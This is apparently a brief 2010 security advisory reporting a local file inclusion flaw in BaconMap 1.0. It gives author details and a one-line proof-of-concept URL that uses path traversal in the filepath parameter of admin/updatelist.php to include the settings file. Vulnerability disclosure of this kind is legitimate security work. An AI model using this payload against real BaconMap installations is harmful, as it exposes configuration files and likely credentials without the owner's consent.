------------------------------------------------------------------------ Software................BaconMap 1.0 Vulnerability...........Local File Inclusion Download................http://baconmap.nmsu.edu/ Release Date............10/10/2010 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................John Leitch Site....................http://www.johnleitch.net/ Email...................john.leitch5@gmail.com ------------------------------------------------------------------------ --Description-- A local file inclusion vulnerability in BaconMap 1.0 can be exploited to include arbitrary files. --PoC-- http://localhost/baconmap/admin/updatelist.php?filepath=../includes/settings.php